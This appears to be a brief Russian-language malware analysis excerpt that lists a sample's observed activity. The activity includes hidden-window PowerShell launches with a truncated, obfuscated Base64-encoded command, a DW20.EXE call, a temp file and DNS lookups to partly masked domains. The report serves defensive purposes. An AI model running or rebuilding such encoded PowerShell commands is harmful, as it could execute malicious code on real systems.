Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0ADQAMQBBAEEARAB4AD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBYACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAQQBCACcALAAnAEsAJwApACwAJwBVAEcAJwApACkAOwAkAFoAM...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1480
- %TEMP%\640009.cvr
- DNS ASK se###way.com
- DNS ASK ik##an.org
- DNS ASK ca##r.com
- DNS ASK qa###dad.com
- DNS ASK mc##ur.es
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0ADQAMQBBAEEARAB4AD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBYACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAQQBCACcALAAnAEsAJwApACwAJwBVAEcAJwApACkAOwAkAFoAM... (со скрытым окном)